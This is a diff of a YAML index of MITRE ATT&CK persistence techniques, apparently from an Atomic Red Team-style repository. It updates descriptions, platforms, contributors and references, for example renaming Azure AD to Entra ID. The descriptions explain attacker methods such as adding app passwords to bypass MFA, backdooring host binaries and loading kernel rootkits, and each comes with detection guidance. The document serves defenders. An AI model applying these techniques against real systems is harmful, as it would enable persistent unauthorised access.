+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31451,16 +31852,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31515,7 +31916,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31576,7 +31976,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31652,7 +32051,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31680,8 +32079,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31707,7 +32104,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31732,23 +32129,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -31758,11 +32153,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -31773,12 +32172,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -31787,6 +32193,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31795,13 +32202,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -31827,10 +32237,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -31839,10 +32257,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31859,14 +32287,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -31941,7 +32366,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32030,24 +32454,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32061,7 +32488,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32076,6 +32503,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32089,11 +32521,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32119,7 +32550,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32133,7 +32563,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32160,8 +32589,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32172,7 +32601,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32213,7 +32643,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32233,12 +32663,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32292,11 +32721,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32383,9 +32811,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32398,12 +32826,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32416,9 +32843,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32427,13 +32856,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32481,14 +32910,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32524,16 +32950,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32574,143 +32999,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
